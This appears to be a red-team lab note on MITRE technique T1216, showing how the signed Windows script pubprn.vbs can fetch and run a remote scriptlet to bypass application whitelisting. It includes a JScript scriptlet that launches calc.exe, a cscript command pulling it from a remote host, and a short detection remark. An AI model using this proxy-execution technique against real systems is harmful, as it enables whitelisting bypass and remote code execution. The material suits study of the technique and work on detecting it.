T1216: pubprn.vbs Signed Script Code Execution

Signed Script Proxy Execution - bypass application whitelisting using pubprn.vbs

Execution

Using pubprn.vbs, we will execute code to launch calc.exe. First of, the xml that will be executed by the script:

http://192.168.2.71/tools/mitre/proxy-script/proxy.sct

<?XML version="1.0"?>
<scriptlet>

<registration
    description="Bandit"
    progid="Bandit"
    version="1.00"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"   
    >
</registration>

<script language="JScript">
<![CDATA[
        var r = new ActiveXObject("WScript.Shell").Run("calc.exe");    
]]>
</script>

</scriptlet>

attacker@victim

cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:http://192.168.2.71/tools/mitre/proxy-script/proxy.sct

Observations

Calc.exe gets spawned by cscript.exe which immediately closes leaving the calc.exe process orphan:

Monitoring commandlines can be useful in detecting the script being abused:

References

System Script Proxy Execution, Technique T1216 - Enterprise | MITRE ATT&CK®attack.mitre.org

PreviousForcing Iexplore.exe to Load a Malicious DLL via COM Abuse NextCode & Process Injection

Last updated 4 years ago

hashtagExecution

hashtagObservations

hashtagReferences

Execution

Observations

References